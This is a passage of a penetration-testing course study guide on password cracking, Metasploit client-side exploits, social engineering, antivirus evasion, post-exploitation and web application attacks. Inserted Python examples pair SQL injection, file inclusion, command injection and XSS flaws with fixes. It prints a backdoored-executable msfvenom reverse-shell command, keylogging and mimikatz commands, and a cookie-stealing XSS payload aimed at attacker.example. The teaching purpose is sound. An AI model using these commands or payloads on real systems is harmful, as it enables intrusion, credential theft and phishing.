advanced php webshell that boasts the robustness of a typical tcp/udp reverse shell with
several utilities that makes post-exploitation much easier.

Module 8: ​Passwords

Lesson 8.1:​ ​Passwords (Part 1) Password Attacks


Skills Learned From This Lesson: Password Hash-dumping, Client-side Attacks, Windows
Permissions Bypass
● > bkhive - A Linux command line utility used to extract the boot key (SYSKEY) from the SYSTEM
registry hive.
● > samdump2 - Used in conjunction with bkhive to decrypt the SAM hive with that boot key and
extract the password hashes of the local user accounts.
● A live CD/USB of any Linux distro can be booted on a machine to mount the machine's
hard drive and bypass the NTFS file permissions on that drive (full-disk encryption such as
BitLocker defeats this).
 

● The SAM hive can be found at \Windows\System32\config\SAM, next to the SYSTEM hive it is
decrypted with.

Lesson 8.2:​ ​Passwords (Part 2) Online Password Cracking


Skills Learned From This Lesson: Password Cracking, Hydra
● thc-hydra - A parallelized login cracker that supports numerous protocols. Causes a lot
of 'noise' on a network as the attacker's IP will register sometimes hundreds of login
attempts. Can get the attacker's IP/MAC address blocked, and can lock out the target accounts
where a lockout policy is in place, so check the policy before spraying passwords.

Lesson 8.3:​ ​Passwords (Part 3) Offline Password Attacks


Skills Learned From This Lesson: John the Ripper, LM/NTLM Hash Cracking, Windows SAM
● John (the Ripper) - Password cracking software written in C.
○ > 'john --format=nt windowshashes.txt --wordlist=passwords.txt' - Command that
uses John to crack the NT hashes in windowshashes.txt using the passwords.txt
wordlist.
○ John the Ripper comes with its own password wordlist (password.lst) that can be used for
cracking.
● LM Hash - Password hashing function of Microsoft LAN Manager and early Windows versions. The
password is upper-cased and split into two 7-character halves, each used as a DES key, so each
half can be cracked independently. Long broken, and disabled by default since Windows Vista.
● NTLM (NT) Hash - Password hashing function designed as the successor to the LM hash: an
unsalted MD4 of the UTF-16LE password. Because it is unsalted and cheap to compute it cracks
very quickly on GPUs; the course notes that most 8-character passwords can be cracked in about
2.5 hours on 2019 hardware.
● Structure of hashed credentials recovered from the Windows SAM (pwdump format)
○ > (Username):(UserID):(LMhash):(NTLMhash):::

Lesson 8.4:​ ​Passwords (Part 4) Using Hashcat


Skills Learned From This Lesson: Hashcat, ‘rockyou’ Wordlist, Pipal
● Hashcat - Password cracking/recovery tool. Uses GPU acceleration to crack password
hashes. CPU-based password cracking can be found in hashcat-legacy
(http://github.com/hashcat/hashcat-legacy)
○ > hashcat -m (mode) hashes.txt -o crackedpasswords.txt
/path/to/desired/wordlist.txt
○ When cracking LM/NTLM hashes in hashcat, the hashes.txt file may only contain
the hashes that need to be cracked. Any other fields and delimiters need to be
removed (cut -d ':' -f 4 hashes.txt > nthashes.txt keeps just the NT hash field), or the
user:hash pairs can be kept and hashcat run with --username. The modes are -m 1000 for NT
hashes and -m 3000 for LM hashes.
 

● The hash mode must be specified when using hashcat. 'hashcat --help' will bring up a list
of the hash modes, amongst other bits of informative data.
● The 'rockyou.txt' wordlist is a massive wordlist filled with recovered passwords from data
breaches concatenated into the same file. Can be found in its compressed state in a Kali
Linux installation by default in the '/usr/share/wordlists/' directory.
● Using rules in Hashcat will define permutations that will be applied to the wordlist. These
rules can be found in '/usr/share/hashcat/rules' and additional rules can be utilized as
well.
● John the Ripper can also be used as a utility to identify the hashing algorithm of a
password hash.
● Some password hashes can be put into google to find the corresponding passwords or
online password cracking utilities can be utilized.
● > pipal - Tool for password analysis and statistics.
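Added example (not part of the original study guide): the pwdump-to-hashcat clean-up above done in Python rather than with cut, so that placeholder hashes are dropped and both hash modes are served. parse_pwdump reads user:rid:lm:nt::: lines, hashcat_inputs returns bare NT hashes for -m 1000 and 16-character LM halves for -m 3000, and username_format keeps user:hash pairs for hashcat's --username option. SAMPLE is constructed; its two real hashes are the LM and NT hashes of the string 'password'.

```python
from typing import Dict, List, NamedTuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # placeholder when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password


class SamRecord(NamedTuple):
    user: str
    rid: int
    lm: str
    nt: str


def parse_pwdump(text: str) -> List[SamRecord]:
    """Parse user:rid:lm:nt::: lines as written by samdump2 or meterpreter's hashdump.

    Blank lines and '#' comments are skipped; hashes are lower-cased so duplicates compare equal.
    """
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed pwdump line: {line!r}")
        records.append(SamRecord(parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return records


def hashcat_inputs(records: List[SamRecord]) -> Dict[str, List[str]]:
    """Split into what each hashcat mode expects.

    -m 1000 takes bare 32-hex NT hashes; -m 3000 takes each 16-hex LM half on its own line,
    which is what makes LM so cheap to crack. Placeholder hashes are dropped and duplicates
    collapsed so the GPU does no redundant work.
    """
    nt: List[str] = []
    lm: List[str] = []
    for r in records:
        if r.nt != EMPTY_NT and r.nt not in nt:
            nt.append(r.nt)
        if r.lm != EMPTY_LM:
            for half in (r.lm[:16], r.lm[16:]):
                if half not in lm:
                    lm.append(half)
    return {"1000": nt, "3000": lm}


def username_format(records: List[SamRecord]) -> List[str]:
    """Alternative input: user:hash lines for 'hashcat --username', so cracked results map back
    to accounts without a second join step."""
    return [f"{r.user}:{r.nt}" for r in records if r.nt != EMPTY_NT]


# Constructed sample dump (not from the original page). Administrator and jsmith both use the
# password 'password'; Guest has a blank password; Administrator has no LM hash stored.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
jsmith:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
"""

if __name__ == "__main__":
    recs = parse_pwdump(SAMPLE)
    for mode, hashes in hashcat_inputs(recs).items():
        print(f"-m {mode}:", *hashes)
    print(*username_format(recs), sep="\n")
```

Write each list to its own file and run hashcat once per mode; if the LM halves crack, the recovered upper-case string bounds the NT search to case variations of the same word, which is far cheaper than a blind wordlist run.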

Teaching Assistant Extra Credit


● Several handy wordlists for password cracking can be found in the FuzzDB Github
Repository (https://github.com/fuzzdb-project/fuzzdb), the Seclists Repository
(https://github.com/danielmiessler/SecLists) as well as searching through Pastebin for
recent password breach dumps (​https://pastebin.com/​).

Module 9: ​Advanced Exploitation

Lesson 9.1:​ ​Advanced Exploitation (Part 1) Introduction


Skills Learned From This Lesson: Intro

Lesson 9.2:​ ​Advanced Exploitation (Part 2) Client Side Attacks


Skills Learned From This Lesson: IE Exploitation, Meterpreter Session Migration, Client-Side
Attacks
● Client-side attacks are carried out by setting up a server that serves the exploit and
listens for incoming connections, and targeting any program that opens files or content
(browsers, Office software, media players, etc.) so that it connects back to the listening
server.
● msf exploit(ms10_002_aurora) - A Metasploit module created to exploit MS10-002 ("Aurora"), a
memory corruption flaw in Internet Explorer.
 

○ This exploit creates a webserver on the specified SRVPORT and hosts the
exploit in the directory specified at URIPATH. From there the target must browse
to the hosted payload with the appropriate web browser (Internet Explorer in this
case) to trigger the exploit. Until then Metasploit will remain in a listening state
while serving the exploit.
● meterpreter > migrate [process id] - Migrates the meterpreter session into another Windows
process that gives the attacker a more advantageous and/or more stable session environment
on the target's machine (for example out of the exploited browser before the user closes it).
● Exploits like these can be chained with attacks such as social-engineering attacks or
DNS cache poisoning to get the target to browse to the server hosting the exploit.
● A meterpreter script can be set in the AutoRunScript option to spawn a new process
following a Client-Side Attack.
● PrependMigrate is another option that, if set to true, will automatically spawn and run
shellcode in a new process prior to creating a meterpreter session.

Lesson 9.3:​ ​Advanced Exploitation (Part 3) Exploiting Java


Skills Learned From This Lesson: Browser Exploitation, Java Payloads, Meterpreter and Java
● In Metasploit, a platform agnostic java applet can be created using the
exploit/multi/browser/java_signed_applet module that when executed will return a
meterpreter session to the attacker.
● A java certificate can also be used to sign the malicious java applet to convince the
target of its legitimacy.
● Since this is a Java-based exploit, an appropriate payload should also be selected (e.g.
java/meterpreter/reverse_tcp).
● Java-based meterpreter sessions have additional restrictions that must be circumvented
to do things like hashdumps.

Lesson 9.4:​ ​Advanced Exploitation (Part 4) Social Engineering


Skills Learned From This Lesson: Social Engineering Toolkit, Website Cloning, Email Phishing
● Social Engineering techniques range from cold-calling for information and piggybacking
into facilities (not requiring much technical skill) to launching phishing campaigns with
malicious file downloads and cloned websites (requiring more technical aptitude).
● Social Engineering Toolkit (SET) - A sophisticated framework with a litany of tools and
exploits centered around launching social engineering attacks against targets
 

(https://github.com/trustedsec/social-engineer-toolkit and included in Kali Linux). Its


features include:
○ Spear-Phishing Attacks
○ Website Attacks
○ Malicious Media Generator
○ Mass Mailer
○ Metasploit Interfaced Payloads and Listeners
○ Arduino-Based Attacks
○ SMS Spoofing
○ Wireless Access Point Attacks
○ QR Code Generator
○ Powershell-based Attacks
● The Mass Mailer in SET can be used in conjunction with a list of email addresses to
launch a mass phishing email attack to the specified targets. The details in the title and
body of the message can also be customized and tuned for specific Social Engineering
campaigns.
● Some popular email providers (e.g. GMail) will most likely (and hopefully) have
email-attachment inspection safeguards built in to protect their users against some of the
email-based social engineering attacks in the Social Engineering Toolkit.
● SET has the ability to interface with Metasploit to create payloads and start Meterpreter
listeners (historically through msfcli, which has since been removed from Metasploit in favour
of msfconsole resource scripts).
● After a target submits her credentials into the SET-cloned website, the credentials are
logged and the user is redirected to the legitimate website's login page.
● In addition to the aforementioned attacks, malicious payloads can also be planted on
USB Drives, CD/DVDs and other removable storage devices then dropped in areas with
regular traffic where potential targets will hopefully take the item and insert it into their
device(s).

Lesson 9.5:​ ​Advanced Exploitation (Part 5) Bypassing Antivirus Software


Skills Learned From This Lesson: msfvenom AV-bypass, Hyperion, .exe-embedded payloads
● > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.77 LPORT=1234 -x
radmin.exe -k -f exe > radmin_backdoored.exe - msfvenom one-liner that embeds a meterpreter
payload into an existing Windows executable (-x template) so that the template keeps working
while the payload runs in a separate thread on execution (-k). Write the output to a different
filename: redirecting to the same name as the template truncates the template before msfvenom
reads it.

 

● An alternative to serving payloads from an apache2 web server is Python's built-in HTTP
server: the SimpleHTTPServer module in Python 2
(https://docs.python.org/2/library/simplehttpserver.html), or 'python3 -m http.server' in
Python 3.
● Hyperion - A cryptographic tool used to encrypt malicious files as a method of bypassing
antivirus. The malicious file will brute-force it's own encryption key to decrypt itself on the
target machine and execute its payload (this process could take some time).
● Veil - Generates Metasploit payloads suited to bypass popular AV analysis
(https://github.com/Veil-Framework/Veil)
● A more reliable method of bypassing AV is to eschew metasploit/meterpreter and to
build custom tools that take advantage of the operating system's api to communicate
with the target's machine (as most non-malicious software does).

Module 10: ​Post-Exploitation

Lesson 10.1: Post-Exploitation (Part 1) File Transfer without an Interactive Shell


Skills Learned From This Lesson: Local Privilege Escalation, Metasploit Post- Exploitation,
Public Exploits
● Meterpreter Scripts - Ruby-based scripts that run within meterpreter sessions. Can be
found in the /usr/share/metasploit-framework/scripts/meterpreter directory on Kali Linux.
● Post-Exploitation (Post) Metasploit Modules - Modules tailored for use after an initial
foothold is achieved. Used for techniques such as pivoting, privilege escalation and data
gathering/exfiltration.
● meterpreter > getuid - Displays the machine_name\username of the account that
meterpreter is running as.
● meterpreter > getsystem - Attempts privilege escalation to NT AUTHORITY\SYSTEM for the
meterpreter session. It depends on the session's user already having some level of
administrative privilege. User Account Control (UAC), introduced with Windows Vista, stops
getsystem from succeeding when the session runs in a non-elevated (medium integrity) process.
● msf > exploit/windows/local/bypassuac - Module that bypasses Windows User Account Control
to obtain an elevated session.
● meterpreter > upload /path/to/file C:\\ - Upload a file to a target via a meterpreter shell.
● meterpreter > background - Backgrounds the current meterpreter session.

 

● msf > post/multi/recon/local_exploit_suggester - This module can be run against a
backgrounded meterpreter session to let Metasploit soft-scan the target and
suggest possible exploits for privilege escalation. By default meterpreter sessions open
in x86. Migrating the meterpreter session to an x64 process and rerunning this module
should be done to obtain a full assessment of applicable privilege escalation
modules.
● > searchsploit - A local repository of exploits from www.exploit-db.com. Installed by
default on Kali Linux.
● > lsb_release -a - Displays general system information on a Debian-based Linux
Machine.
● > ps aux - Displays a detailed list of currently active processes on a linux system.

Lesson 10.2: Post-Exploitation (Part 2) Using Metasploit


Skills Learned From This Lesson: Token Impersonation, Mimikatz, Keystroke Sniffing
● msf > post/windows/gather - Information gathering and enumeration modules.
● meterpreter > search -f filename.txt - Searches the compromised machine for a file
matching the submitted pattern. Use wildcards (*) to broaden the range of the search.
● meterpreter > keyscan_start - Enables the keystroke sniffer functionality built into
meterpreter.
● meterpreter > keyscan_dump - Prints the captured keystrokes to the terminal window.
● meterpreter > keyscan_stop - Disables keystroke sniffing.
○ Keystrokes capture is partially dependent upon which process meterpreter is
running as. For instance, if the attacker migrates the meterpreter session to
winlogon.exe, she will increase her chances of capturing login credentials.
● After compromising a process using a web-based exploit (PHP or Java), the subsequent
meterpreter session will typically be restricted in its capabilities. A way to overcome this
is to use any recovered credentials in conjunction with a TCP based exploit (e.g.
MS08-067) to obtain a tcp meterpreter session with less or no restrictions. Some of
these exploits may even, by default, spawn with NT AUTHORITY\SYSTEM privileges.
● meterpreter > incognito - Functionality in meterpreter that allows the attacker to
impersonate the token of another user and thus gain that user's privileges.
 

○ meterpreter > list_tokens -u - List all the tokens of logged in users available for
token impersonation.
○ meterpreter > impersonate_token COMPUTER\\USERNAME - Attempts to
impersonate the specified user on the system.
○ meterpreter > rev2self - Reverts to the original uid of the meterpreter session.
○ meterpreter > load mimikatz - Loads the mimikatz extension into the meterpreter
session (requires SYSTEM privileges, since it reads LSASS memory).
○ meterpreter > kerberos - Retrieves Kerberos credentials, including plaintext passwords
where they are cached in memory, via the mimikatz extension.
● pass-the-hash - An attack that allows an attacker to authenticate to a remote server or
service by using the underlying NTLM or LanMan hash of a user's password instead of
the plaintext password itself.

Lesson 10.3: Post-Exploitation (Part 3) Pivoting


Skills Learned From This Lesson: Metasploit Routing, Metasploit Proxy Server, Proxychains
● msf > route add (network_ip_address) (subnet_mask) (session_id) - Adds a network
route through a compromised host to enable the scanning, enumeration and possible
exploitation of hosts on other networks that would otherwise be inaccessible.
● msf > auxiliary/server/socks4a - Starts a SOCKS proxy server and gives the ability to route
the network traffic of other tools (using proxychains) into Metasploit and through any routes
that may be set up within it.
● When pivoting, it is usually necessary to use a bind shell payload to exploit additional
systems: a reverse shell would have to connect back to the attacker, which a target in the
remote network cannot reach, whereas Metasploit can connect out to a bind shell through the
added route.
● > proxychains - A Linux utility that routes the traffic of CLI tools through a
proxy server as defined in the /etc/proxychains.conf file.
● When enumerating a linux system during post-exploitation, checking the contents of the
~/.bash_history file could reveal cleartext passwords that were accidentally typed directly
into the terminal and other clues that could assist in post-exploitative processes.

Lesson 10.4: Post-Exploitation (Part 4) Setting up a Domain Controller (Rename to “Domain Controller Exploitation”)
Skills Learned From This Lesson: smbexec, Responder, Domain Controllers
● SMBexec - A psexec-style attack that uses SMB as the attack vector.
● Responder - Responder is an LLMNR, NBT-NS and MDNS poisoner, with built-in
HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting
 

NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.


Assists with credential capturing with an emphasis on stealth.
● Domain Controller - a​ ​server that responds to security authentication requests (logging
in, checking permissions, etc.) within a Windows Domain
● Domain Administrator - Administrative account level privileges that gives the account
Admin rights for an entire domain and all the devices within it. See "God Mode".

Teaching Assistant Extra Credit


● A few tools that may help in gathering information on a Linux system for privilege
escalation are Lynis (http://cisofy.com/lynis), LinEnum
(https://github.com/rebootuser/LinEnum) and Linux Exploit Suggester
(https://github.com/mzet-/linux-exploit-suggester).
● When using proxychains, if editing the /etc/proxychains.conf file is undesirable, a copy of
this file can be made and placed in the current working directory and edited to the
necessary specifications. Proxychains' default path is set to look for a proxychains.conf
file in the current working directory before using the /etc/proxychains.conf config file.
● Two other tools not previously mentioned that assist in gathering information and
credentials in conjunction with Domain Controllers and Active Directory are Impacket
(https://github.com/SecureAuthCorp/impacket) and Bloodhound
(http://github.com/BloodHoundAD/BloodHound).
● Since maintaining persistence is an essential part of the Post-Exploitation phase of
penetration testing, it may be worthwhile to research a few Command and Control (C2)
frameworks to facilitate this. Two that come to mind are Merlin, an open-source C2
framework based around using HTTP/2 for communication, and Cobalt Strike, a robust
commercial C2 framework and adversary simulation tool.
● For more information on specific tactics used by known Advanced Persistent Threat
(APT) Actors, it's worth bookmarking and studying MITRE's ATT&CK Matrix
(https://attack.mitre.org/).

Module 11: WebApps

Lesson 11.1: WebApp Introduction (Part 1) Web App Testing
Skills Learned From This Lesson: Intro

Lesson 11.2: WebApp (Part 2) Vulnerable Web Applications
Skills Learned From This Lesson: DVWA, Burp Suite, HTTP Requests
● Damn Vulnerable Web Application (DVWA) - A Web Application based on PHP/MySQL
designed to be intentionally vulnerable and used to practice web application testing
(https://github.com/ethicalhack3r/DVWA)
● OWASP Webgoat - A deliberately insecure Java web application, designed by OWASP
(https://github.com/WebGoat/WebGoat)
● Though there are many web application scanners out there, to avoid being led astray
by false positives, or by the scanner missing vulnerabilities in custom web applications, it
is recommended to manually test web applications.
● Portswigger Burp Suite - A Java-based web application penetration testing proxy and
scanner (the automated scanner is in the Pro version only). Requests going from the
browser to the server can be captured, modified en route and passed along to analyze
the programming logic of a web application and test how the application responds to
unexpected input from the attacker.
○ Burp Intruder - A fuzzer built into Burp Suite.
○ Burp Decoder - Decodes encoded strings (e.g. Base64) in Burp Suite.
○ Burp Repeater - requests captured in the web proxy can be sent to Repeater to
be inspected, edited and repeated to test the behavior of the web application.
○ Burp Comparer - Compares 2 requests and notes their differences.
○ Burp Spider - Web crawler built into Burp Suite.
○ Burp Extender - Allows the installation of custom plugins to extend the
functionality of Burp Suite.
○ Burp Scanner - Automated passive and active scanner that scans a Web
Application according to a set of predefined checks. Very noisy.
○ Burp Sequencer - Used for analyzing the amount of randomness in a sample of
tokens. Used to test session IDs, anti-CSRF tokens, authentication tokens, etc.
● HTTP Request Methods - Verbs that indicate the desired action to be performed for a
given resource.
○ GET - Requests a representation of the specified resource. Requests using GET
should only retrieve data.
○ POST - Used to submit an entity to the specified resource, often causing a
change in state or side effects on the server.
○ PUT - Replaces all current representations of the target resource with the request
payload.
○ DELETE - Deletes the specified resource.
○ HEAD - Asks for a response identical to that of a GET request, but without the
response body.
○ OPTIONS - Asks the server the available request methods that can be used
during communication.
○ CONNECT - Establishes a tunnel to the server identified by the target resource.
○ TRACE - Performs a message loop-back test along the path to the target
resource.
○ PATCH - Used to apply partial modifications to a resource.
● HTTP Header - Allow the client and the server to pass additional information with the
request or the response. An HTTP header consists of its case-insensitive name followed
by a colon ':', then by its value (without line breaks). Leading white space before the
value is ignored.
● Web Crawler (spider) - A bot designed to systematically browse all webpages on a site
(or the Internet in the case of Google/Bing/etc.). These are typically integrated into most
modern WebApp Pentesting Proxies but should be used with caution.
● robots.txt - A document hosted on a web application designed to tell web crawlers which
pages and directories to omit from their crawling. Web App Pentesting Proxies typically
ignore these instructions. Because robots.txt is only a request to crawlers and not an
access control, it often lists exactly the sensitive web pages/directories that may have
vulnerabilities or information to assist in finding vulnerabilities, so read it early.

Lesson 11.3: WebApp (Part 3) SQL Injection
Skills Learned From This Lesson: Injection Attacks, SQL Injection, SQLMap
● SQL Injection - Attacks a web application by injecting SQL through vulnerable input
fields (form fields, URL parameters, cookies, headers) so that the backend database runs
attacker-chosen queries: reading Personally Identifiable Information (PII) or other
sensitive data, modifying it, and in some configurations reading files or running
commands on the database server.
● IFrame Injection - An attack of one or more <iframe> </iframe> tags that have been
inserted into a page or post’s content and typically downloads an executable program or
conducts other actions that compromise the site visitors’ computers.
● LDAP Injection - Used to exploit web applications which could reveal sensitive user
information or modify information represented in the LDAP (Lightweight Directory Access
Protocol) data stores. Can be used similarly to SQL Injection.
● Seeing "?id=" (or any parameter that is clearly used to select a record) in the URL of a
web page is a sign that user input reaches a database query, so it is a good place to test
for SQL Injection.
● Putting a single quote ' at the end of a possible injection point closes the string literal
early; if the input is not escaped or parameterized, the query becomes syntactically
invalid and the page errors or behaves unexpectedly, a sign the application is vulnerable.
● The syntax of a SQL Injection may need to be modified to fit the type of backend
database being used on the server (e.g. MySQL, MSSQL, Oracle and PostgreSQL differ in
comment syntax, string concatenation and system tables).
● Putting -- into a SQL Injection point will comment out the remainder of the intended SQL
query and only run the query submitted by the attacker. Note that MySQL requires a space
after the dashes ("-- "), and # also works there; URL-encode the payload when it goes in a
GET parameter.
● Salt - "Random" data put into the hashing of a password so that identical passwords
produce different hashes and precomputed (rainbow) tables are useless, making cracking
slower in the case of a breach.
● SQLMap - An open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over of database servers.
○ sqlmap ... --os-shell - SQLMap will attempt to get a command shell using
injection attacks against the database.
● XPath Injection - Similar to SQL Injection, XPath Injection attacks occur when a website
uses user-supplied information to construct an XPath query for XML data. By sending
intentionally malformed information into the web site, an attacker can find out how the
XML data is structured, or access data they may not normally have access to. They may
even be able to elevate their privileges on the web site if the XML data is being used for
authentication (such as an XML based user file).
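The single-quote probe, the tautology-plus-comment payload and the fix a developer should apply, as an added example that is not part of the course material. It uses Python's bundled sqlite3 driver against a constructed two-row users table; the table contents, the "?id=" handler shape and the payload are assumptions for illustration. SQLite accepts a bare "--" comment, so on MySQL the payload would end in "-- " or "#" instead.

```python
#!/usr/bin/env python3
"""Added example (not from the course): SQL injection against an in-memory
SQLite database. The users table below is constructed sample data."""
import sqlite3


def build_db():
    """Create the constructed sample database (two rows of fake PII)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, ssn TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "alice", "111-11-1111"),
        (2, "bob", "222-22-2222"),
    ])
    return conn


def lookup_vulnerable(conn, user_id):
    """Typical '?id=' handler: the parameter is pasted straight into the SQL text."""
    query = "SELECT name, ssn FROM users WHERE id = '" + user_id + "'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_id):
    """Bound parameter: the value travels separately from the SQL text, so quotes
    and comment markers in the input are data, not syntax."""
    query = "SELECT name, ssn FROM users WHERE id = ?"
    return conn.execute(query, (user_id,)).fetchall()


def quote_probe(conn, user_id):
    """The lesson's first test: append a single quote and see whether the query
    breaks. True means the input reached the SQL parser unescaped."""
    try:
        lookup_vulnerable(conn, user_id + "'")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = build_db()
    # Attacker-controlled id: closes the string, ORs in a tautology, and comments
    # out the closing quote the application appends.
    payload = "' OR '1'='1' -- "
    print("probe breaks query:", quote_probe(db, "1"))
    print("vulnerable:", lookup_vulnerable(db, payload))   # every row leaks
    print("parameterized:", lookup_safe(db, payload))      # no rows
```

The same payload returns every row from the concatenated query and nothing from the parameterized one; sqlmap automates exactly this kind of differential test, but the manual probe is what tells you where to point it.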

Lesson 11.4: WebApp (Part 4) File Inclusion
Skills Learned From This Lesson: LFI, RFI, Command Execution
● Local File Inclusion - The process of including files, that are already locally present on
the server, through the exploitation of vulnerable inclusion procedures implemented in
the application.

 
● Remote File Inclusion - The process of including remote files through the exploitation of
vulnerable inclusion procedures implemented in the application.
● Command Execution - Attacks a web application by defeating the parsing logic of an
input field filter (if there is one) and sending commands to an operating system level
program, thereby gaining unintended control of that program and of the system as a whole.
● During command injection attacks, understanding the underlying operating system is
essential to knowing which separators/control operators will give the desired results. On
Linux, putting '&&' after the intended input of a command execution point will run the
expected command and then run a command submitted by the attacker, such as
'cat /etc/passwd', but only if the first command succeeds; ';' runs the second command
unconditionally, '||' only if the first fails, and '|' pipes into it. On Windows cmd.exe '&'
and '&&' behave similarly.
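Both sinks from this lesson, a file include driven by a "page" parameter and a shell command built from a "host" parameter, each in a vulnerable and a hardened form, as an added example that is not from the course. The web root, its files and the command (echo standing in for ping so it runs anywhere) are constructed assumptions; the control-operator cases show why the '&&' vs ';' vs '||' choice matters.

```python
#!/usr/bin/env python3
"""Added example (not from the course): local file inclusion and OS command
injection, vulnerable and hardened. All files and inputs are constructed."""
import os
import re
import subprocess
import tempfile


def make_site():
    """Build a constructed web root with one legitimate page and one file that
    lives outside it, standing in for /etc/passwd."""
    root = tempfile.mkdtemp()
    webroot = os.path.join(root, "pages")
    os.mkdir(webroot)
    with open(os.path.join(webroot, "home.txt"), "w") as f:
        f.write("welcome page")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash")
    return webroot


def include_vulnerable(webroot, page):
    """Equivalent of include($_GET['page']): the parameter is joined to the web
    root unchecked, so '../' walks out of it. os.path.join also discards the web
    root entirely if page is absolute, e.g. '/etc/passwd'."""
    with open(os.path.join(webroot, page)) as f:
        return f.read()


def include_safe(webroot, page):
    """Resolve the final path and refuse anything that is not inside the web root."""
    root = os.path.realpath(webroot)
    target = os.path.realpath(os.path.join(root, page))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError("path escapes web root: " + page)
    with open(target) as f:
        return f.read()


def ping_vulnerable(host):
    """shell=True hands the whole string to /bin/sh, so && ; | and || are honoured.
    'echo' stands in for the real ping binary so the example runs offline."""
    out = subprocess.run("echo pinging " + host, shell=True,
                         capture_output=True, text=True)
    return out.stdout.strip().splitlines()


def ping_safe(host):
    """Allow-list the input and pass it as one argv element: no shell is involved."""
    if not re.fullmatch(r"[A-Za-z0-9.\-]{1,253}", host):
        raise ValueError("invalid host: " + host)
    out = subprocess.run(["echo", "pinging", host], capture_output=True, text=True)
    return out.stdout.strip().splitlines()


if __name__ == "__main__":
    site = make_site()
    print(include_vulnerable(site, "../secret.txt"))        # leaks the outside file
    print(ping_vulnerable("10.0.0.1 && echo INJECTED"))     # second command runs
    print(ping_vulnerable("10.0.0.1 || echo INJECTED"))     # echo succeeded, so it does not
    print(ping_safe("10.0.0.1"))                            # the only thing the safe path runs
```

The '||' case is the point the lesson makes about knowing the operating system: the operator that works depends on whether the legitimate command succeeds, which is why ';' is usually the first thing to try on Linux.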

Lesson 11.5: WebApp (Part 5) Cross Site Scripting
Skills Learned From This Lesson: CSRF, BeEF, OWASP Top 10
● JavaScript - lightweight interpreted (like Python, unlike C which needs to be
pre-compiled) programming language used as a scripting language for Web pages and
many non-browser environments such as Node.js, Apache CouchDB, Electron and
Adobe Acrobat.
● Cross Site Scripting (XSS) - XSS attacks occur when an attacker uses a web application
to send malicious JavaScript to a different end user. Stored XSS is saved on the
server (usually in the form of comments or profile fields) and served to everyone who
views the page; Reflected XSS is passed in as a request parameter that the site renders
into the page, so the victim has to be lured into opening a crafted link.
● Cross Site Request Forgery (CSRF) - An attack that forces an end user to execute
unwanted actions on a web application in which they're currently authenticated.
● From the perspective of a security conscious developer, all user data should be
untrusted and properly validated and encoded for the context it is output in. As a
penetration tester, then, we should make sure to test all fields where users can input
data, upload files, etc. to check for possible vulnerabilities.
● The Browser Exploitation Framework (https://beefproject.com/) - A penetration testing
tool that focuses on the web browser. BeEF will hook one or more web browsers and
use them as beachheads for the launching of directed command modules and further
attacks against the system from within the browser context.
● The OWASP Top 10 is a list of the Top 10 critical web application security risks. Last
revised in 2017 and a critical document to read and understand to be successful in
Web Application Penetration Testing
(https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf).
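Reflected XSS in a greeting page, vulnerable beside fixed, as an added example that is not part of the course. The templates, the cookie-stealing payload and the attribute-breakout payload are constructed for illustration; the point it adds is that encoding must match the output context, since escaping only angle brackets does nothing for an injection that lands inside an attribute.

```python
#!/usr/bin/env python3
"""Added example (not from the course): reflected XSS in two output contexts,
HTML text and an HTML attribute, each vulnerable and hardened. All markup
and inputs are constructed."""
import html


def greet_vulnerable(name):
    """Untrusted input concatenated into HTML text: the browser parses any tags in it."""
    return "<p>Hello, " + name + "</p>"


def greet_safe(name):
    """Encode for the HTML text context: < > & " ' become entities."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def link_vulnerable(url):
    """Attribute context with a half-measure filter: stripping < and > does not stop
    an attacker from closing the quoted attribute and adding an event handler."""
    cleaned = url.replace("<", "&lt;").replace(">", "&gt;")
    return '<a href="' + cleaned + '">profile</a>'


def link_safe(url):
    """Attribute context: quote-escape AND restrict the scheme, so a javascript:
    URL (which needs no special characters at all) is refused."""
    if not url.startswith(("http://", "https://")):
        raise ValueError("unsupported URL scheme")
    return '<a href="' + html.escape(url, quote=True) + '">profile</a>'


if __name__ == "__main__":
    steal = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"
    print(greet_vulnerable(steal))   # script tag reaches the browser intact
    print(greet_safe(steal))         # rendered as literal text
    breakout = '" onmouseover="alert(1)'
    print(link_vulnerable(breakout))  # new attribute injected
    print(link_safe("https://example.com/?q=" + breakout))  # stays inside href
```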

Teaching Assistant Extra Credit


● Browser extensions like FoxyProxy may assist in quickly configuring a web browser to
route traffic through http proxies for WebApp testing.
● The Mozilla Foundation has a wealth of information about the standard web technologies
encountered in the wild that should be studied and understood to be successful in the
testing of Web Applications (https://developer.mozilla.org/en-US/docs/Web/)
● An alternative to Burp Suite is OWASP Zed Attack Proxy (ZAP), a free and open-source
Web Application Testing proxy. It covers most of the same ground (intercepting proxy,
spider, fuzzer, active scanner) at no cost.
● Browser extensions like BuiltWith and Wappalyzer are essential to Web Application
Penetration testing as they give a quick glimpse into the technologies being used on a
web application.
● NoSQLMap - An automated tool for the exploitation of non-relational databases such as
MongoDB and CouchDB (https://github.com/codingo/NoSQLMap).
● An excellent publicly facing source of Web Payloads can be found at the
PayloadsAllTheThings Repository hosted on GitHub
(https://github.com/swisskyrepo/PayloadsAllTheThings).
